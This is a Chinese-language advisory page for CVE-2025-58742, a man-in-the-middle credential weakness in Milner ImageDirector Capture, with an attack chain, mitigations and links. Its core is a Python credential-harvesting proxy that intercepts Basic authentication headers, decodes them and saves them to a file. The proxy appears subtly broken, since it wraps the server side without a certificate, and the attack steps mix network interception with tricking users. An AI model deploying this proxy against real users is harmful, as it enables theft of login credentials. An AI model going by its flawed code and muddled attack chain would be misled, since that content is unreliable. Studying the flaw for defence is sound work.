CVE-2025-58742: Milner ImageDirector Capture 中间人认证绕过漏洞

漏洞信息

漏洞编号

CVE-2025-58742

漏洞类型

中间人攻击(AiTM)

CVSS评分

5.9 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Milner ImageDirector Capture

漏洞概述

CVE-2025-58742是Milner ImageDirector Capture（Windows版本）中的一个中等严重性安全漏洞。该漏洞属于凭证保护不足（Insufficiently Protected Credentials）和通信信道限制不当（Improper Restriction of Communication Channel to Intended Endpoints）类型。漏洞存在于ImageDirector Capture的连接设置对话框中，攻击者可以利用此漏洞通过修改"Server"字段来重定向客户端认证流量，从而实现中间人攻击（Adversary-in-the-Middle, AiTM）。受影响的版本为7.0.9至7.6.3.25808之前的ImageDirector Capture。该漏洞CVSS 3.1评分为5.9，属于中危级别，主要影响系统的完整性保护机制。攻击者无需特殊权限或用户交互即可发起攻击，但需要处于网络可达位置。由于该产品主要用于文档图像捕获和处理，认证凭证的泄露可能导致敏感扫描文档被窃取或篡改。

技术细节

该漏洞的技术根源在于ImageDirector Capture的连接设置功能对服务器地址验证不足。当用户在连接设置对话框中配置服务器地址时，应用程序直接使用用户提供的地址建立连接，而缺乏对服务器证书的有效验证机制。攻击者可以通过以下方式利用此漏洞：1) 攻击者首先在网络层面进行监听或实施ARP欺骗，拦截客户端与服务器之间的通信；2) 攻击者修改客户端配置中的"Server"字段，将其指向攻击者控制的恶意服务器；3) 应用程序在认证过程中会向攻击者控制的服务器发送凭证信息；4) 攻击者截获这些凭证后，可以转发到真实服务器完成认证，从而建立完整的中间人通道。整个过程中，由于应用程序未实施严格的证书校验（如证书固定或域名验证），客户端无法识别服务器身份的真实性，导致认证流程被攻击者完全控制。该漏洞利用的关键在于应用程序信任了未经验证的服务器响应，使得攻击者能够在认证阶段窃取用户凭据。

攻击链分析

STEP 1

1 - 网络侦察与中间人位置建立

攻击者首先需要处于网络可达位置，通过ARP欺骗、DNS劫持或网络嗅探等方式，建立与目标用户之间的中间人位置，能够拦截和修改双方通信流量。

STEP 2

2 - 诱导用户修改服务器配置

攻击者通过社会工程学手段（如钓鱼邮件、虚假技术支持等）诱导用户进入ImageDirector Capture的连接设置对话框，修改'Server'字段为攻击者控制的恶意服务器地址。

STEP 3

3 - 拦截认证请求并捕获凭证

当用户尝试连接认证时，应用程序将认证请求发送至攻击者控制的服务器。攻击者通过中间人代理截获包含Basic认证或其他认证机制的请求，提取用户凭证信息。

STEP 4

4 - 中继认证完成攻击

攻击者使用截获的凭证向真实服务器发起认证请求，建立完整的认证会话。由于应用程序缺乏证书校验，攻击者可以成功完成整个认证流程。

STEP 5

5 - 持久化控制与数据窃取

攻击者建立稳定的中间人通道后，可以持续监控和窃取用户通过ImageDirector Capture处理的敏感文档图像数据，甚至可能在后续通信中注入恶意内容。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-58742 PoC - ImageDirector Capture AiTM Attack
# This PoC demonstrates the MITM vulnerability in ImageDirector Capture

import socket
import ssl
import threading
import base64
import json

class AiTMProxy:
    def __init__(self, attacker_port=8443, target_server='legitimate-server.com', target_port=443):
        self.attacker_port = attacker_port
        self.target_server = target_server
        self.target_port = target_port
        self.captured_credentials = []
    
    def start_proxy(self):
        """Start the AiTM proxy server"""
        server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server_socket.bind(('0.0.0.0', self.attacker_port))
        server_socket.listen(5)
        print(f"[*] AiTM Proxy listening on port {self.attacker_port}")
        
        while True:
            client_socket, addr = server_socket.accept()
            print(f"[*] Connection from {addr}")
            threading.Thread(target=self.handle_client, args=(client_socket,)).start()
    
    def handle_client(self, client_socket):
        """Handle client connection and forward to target"""
        try:
            # Connect to legitimate server
            target_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            target_socket.connect((self.target_server, self.target_port))
            
            # Wrap with SSL for HTTPS
            context = ssl.create_default_context()
            target_ssl = context.wrap_socket(target_socket, server_hostname=self.target_server)
            client_ssl = context.wrap_socket(client_socket, server_side=True)
            
            # Intercept and log credentials
            self.intercept_traffic(client_ssl, target_ssl)
        except Exception as e:
            print(f"[!] Error: {e}")
    
    def intercept_traffic(self, client, server):
        """Intercept and log authentication data"""
        try:
            while True:
                data = client.recv(4096)
                if not data:
                    break
                
                # Log captured authentication data
                if b'Authorization' in data or b'Basic' in data:
                    self.log_credentials(data)
                
                # Forward to legitimate server
                server.sendall(data)
                response = server.recv(4096)
                client.sendall(response)
        except:
            pass
        finally:
            client.close()
            server.close()
    
    def log_credentials(self, data):
        """Extract and log credentials"""
        for line in data.decode('utf-8', errors='ignore').split('\r\n'):
            if 'Authorization:' in line or 'Basic ' in line:
                cred = line.split(' ')[-1]
                decoded = base64.b64decode(cred).decode('utf-8', errors='ignore')
                self.captured_credentials.append({
                    'timestamp': str(datetime.now()),
                    'credential': decoded
                })
                print(f"[!] Captured credentials: {decoded}")
                
                # Save to file
                with open('captured_creds.json', 'a') as f:
                    json.dump(self.captured_credentials[-1], f)
                    f.write('\n')

# Exploitation steps:
# 1. Attacker sets up this proxy server
# 2. User modifies ImageDirector Capture 'Server' field to point to attacker IP
# 3. When user authenticates, credentials are captured by proxy
# 4. Attacker uses captured credentials to authenticate to real server

if __name__ == "__main__":
    from datetime import datetime
    proxy = AiTMProxy(attacker_port=8443, target_server='legitimate-server.com')
    proxy.start_proxy()

影响范围

Milner ImageDirector Capture 7.0.9

Milner ImageDirector Capture < 7.6.3.25808

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：1) 限制用户对连接设置对话框的访问权限，仅允许受信任的管理员修改服务器配置；2) 在网络层面实施严格的访问控制，阻止用户连接到非预期的服务器地址；3) 监控和审计ImageDirector Capture的配置变更日志；4) 考虑使用网络分段技术，将ImageDirector Capture部署在独立的受保护网段中；5) 加强员工安全意识培训，警惕社会工程学攻击；6) 实施强制的网络通信加密策略，确保所有认证流量使用受信任的TLS通道。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-58742
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-58742
3 Details https://www.cvedetails.com/cve/CVE-2025-58742/
4 VulDB https://vuldb.com/cve/CVE-2025-58742
5 Link https://sra.io/advisories